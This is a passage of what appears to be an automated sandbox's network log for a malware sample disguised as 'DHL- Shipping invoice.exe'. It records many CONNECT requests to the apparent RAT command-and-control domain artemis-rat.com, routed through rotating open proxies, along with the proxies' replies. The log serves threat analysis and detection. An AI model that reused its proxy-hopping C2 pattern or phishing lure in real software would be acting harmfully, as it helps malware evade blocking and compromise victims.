                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:22.750283957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:38.546649933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            125192.168.2.45036466.228.33.190466486484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.183896065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            126192.168.2.45032612.186.205.120806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.188508987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            127192.168.2.450218200.41.148.2120006484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.200659990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            128192.168.2.450380185.162.229.127806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.207927942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.295274973 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:36:59 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            129192.168.2.45018352.80.19.20731286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.209506035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.632369995 CET72INHTTP/1.1 200 Connection established
                            Proxy-Agent: Fortinet-Proxy/1.0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            130192.168.2.450322131.196.212.172806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.216952085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            131192.168.2.450389172.67.181.136806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.219837904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.306838036 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:36:59 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            132192.168.2.450360199.229.254.12941456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.229088068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            133192.168.2.450317130.162.213.17531286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.232700109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.145729065 CET39INHTTP/1.1 200 Connection established


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            134192.168.2.4501658.222.239.209806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.232877970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.952868938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.999815941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.232291937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.453552961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.640871048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            135192.168.2.45016639.108.227.108806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.237552881 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.580718040 CET767INHTTP/1.1 403 Forbidden
                            Server: Beaver
                            Cache-Control: no-cache
                            Content-Type: text/html
                            Content-Length: 635
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                            Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            136192.168.2.450276157.25.92.7431286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.242311954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.431128979 CET1254INHTTP/1.1 403 Forbidden
                            Server: squid/3.5.28
                            Mime-Version: 1.0
                            Date: Tue, 12 Mar 2024 07:36:59 GMT
                            Content-Type: text/html;charset=utf-8
                            Content-Length: 952
                            X-Squid-Error: ERR_ACCESS_DENIED 0
                            Content-Language: en
                            X-Cache: MISS from ah_test
                            Via: 1.1 ah_test (squid/3.5.28)
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 41 65 72 6f 68 69 76 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 57 65 62 20 50 61 67 65 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 0a 0a 62 6f 64 79 0a 3a 6c 61 6e 67 28 66 61 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 52 6f 79 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 3a 6c 61 6e 67 28 68 65 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 7d 0a 20 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 22 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 73 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 35 62 38 63 62 64 3b 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 61 6e 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 65 20 77 65 62 20 70 61 67 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 6e 65 74 77 6f 72 6b 20 70 6f 6c 69 63 79 2e 20 49 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 61 6e 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 22 3e 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 3c 2f 61 3e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 43 61 74 65 67 6f 72 79 3a 20 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 22 3e 47 65 6e 65 72 61 74 65 64 20 54 75 65 2c 20 31 32 20 4d 61 72 20 32 30 32 34 20 30 37 3a 33 36 3a 35 39 20 47 4d 54 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                            Data Ascii: <html><head><meta type="copyright" content="Copyright (C) 1996-2018 The Aerohive"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: Web Page Blocked</title><style type="text/css">... body:lang(fa) { direction: rtl; font-size: 100%; font-family: Tahoma, Roya, sans-serif; float: right; }:lang(he) { direction: rtl; } --></style></head><body id="ERR_ACCESS_DENIED"><div id="titles"><h1 style="color: #5b8cbd;">The requested URL cannot be retrieved</h1></div><div id="content"><p>Access to the web page has been blocked in accordance with the network policy. If you believe this is an error, please contact you system administrator.</p><p style="color: #7192b4;">URL: <a href="https://artemis-rat.com/*">https://artemis-rat.com/*</a></p><p style="color: #7192b4;">Category: </p><br></div><div id="footer"><p style="font-size: 12px;">Generated Tue, 12 Mar 2024 07:36:59 GMT</p></div></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            137192.168.2.450311209.14.112.910806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.249742031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            138192.168.2.450399188.114.99.171806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.260967016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.348273993 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:36:59 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            139192.168.2.45023091.134.140.16025726484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.289747953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.812231064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            140192.168.2.450388107.180.95.177647316484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.290113926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.704267979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.140403986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.016199112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.750961065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.562742949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.359500885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.859977007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:16.750068903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            141192.168.2.45026363.250.52.8281186484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.309048891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.564301014 CET207INHTTP/1.1 400 Bad request
                            Content-length: 90
                            Cache-Control: no-cache
                            Connection: close
                            Content-Type: text/html
                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                            Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            142192.168.2.45043466.45.246.19488886484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.310950041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            143192.168.2.45019458.18.43.34108006484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.322326899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.109112978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            144192.168.2.450273125.141.139.11255666484C:\Users\user\Desktop\DHL- Shipping invoice.exe
